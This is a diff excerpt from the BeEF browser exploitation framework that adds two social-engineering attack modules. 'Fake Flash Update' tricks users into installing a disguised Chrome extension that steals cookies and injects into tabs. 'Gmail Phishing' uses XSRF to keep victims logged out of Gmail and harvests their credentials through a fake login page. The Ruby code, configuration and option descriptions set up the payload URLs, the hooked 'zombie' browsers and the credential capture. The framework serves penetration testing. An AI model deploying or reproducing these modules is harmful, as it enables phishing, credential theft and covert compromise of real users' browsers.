# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
fake_flash_update:
enable: true
category: "Social Engineering"
name: "Fake Flash Update"
description: "Prompts the user to install an update to Adobe Flash Player.<br />The default install file is a Chrome extension. <br /><br /> A chrome extenstion has privileged access and can do a whole lot.. <ul><li>- Access all tabs and inject beef into all tabs</li><li>- Use hooked browser as a proxy to do cross domain requests</li><li>- Get all cookies including HTTPonly cookies</li></ul><br />See chrome extensions beef modules for more examples<br />See extensions/demos/flash_update_chrome_extension for extension source"
authors: ["mh"]
target:
user_notify: ['ALL']

38
modules/social_engineering/fake_flash_update/module.rb Normal file
View File

@@ -0,0 +1,38 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Fake_flash_update < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
payload = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/adobe_flash_update.crx"
image = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/adobe_flash_update.png"
return [
{'name' =>'payload', 'description' =>'Location of the chrome extension that user is promted to install', 'ui_label'=>'Chrome extension', 'value' => payload},
{'name' =>'image', 'description' =>'Location of image for the update prompt', 'ui_label'=>'Splash image', 'value' => image}
]
end
#
# This method is being called when a zombie sends some
# data back to the framework.
#
def post_execute
save({'answer' => @datastore['answer']})
end
end

51
modules/social_engineering/gmail_phishing/command.js Normal file
View File

File diff suppressed because one or more lines are too long

25
modules/social_engineering/gmail_phishing/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
gmail_phishing:
enable: true
category: ["Social Engineering"]
name: "Google Phishing"
description: "This plugin uses an image tag to XSRF the logout button of Gmail. Continuously the user is logged out of Gmail (eg. if he is logged in in another tab). Additionally it will show the Google favicon and a Gmail phishing page (although the URL is NOT the Gmail URL)."
authors: ["floyd @floyd_ch floyd.ch"]
target:
user_notify: ['ALL']

50
modules/social_engineering/gmail_phishing/module.rb Normal file
View File

@@ -0,0 +1,50 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Gmail_phishing < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
xss_hook_url = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html"
logout_gmail_interval = 10000
wait_seconds_before_redirect = 1000
return [
{'name' => 'xss_hook_url',
'description' => 'The URI including the XSS to hook a browser. If the XSS is not exploitable via an URI, simply leave this field empty, but this means you will loose the hooked browser after executing this module.',
'ui_label' => 'XSS hook URI',
'value' => xss_hook_url,
'width' => '300px' }, {
'name' => 'logout_gmail_interval',
'description' => 'The victim is continuously loged out of Gmail. This is the interval in ms.',
'ui_label' => 'Gmail logout interval (ms)',
'value' => logout_gmail_interval,
'width' => '100px' }, {
'name' => 'wait_seconds_before_redirect',
'description' => 'When the user submits his credentials on the phishing page, we have to wait (in ms) before we redirect to the real Gmail page, so that BeEF gets the credentials in time.',
'ui_label' => 'Redirect delay (ms)',
'value' => wait_seconds_before_redirect,
'width' => '100px' }
]
end
def post_execute
content = {}
content['Result'] = @datastore['result']
save content
end
end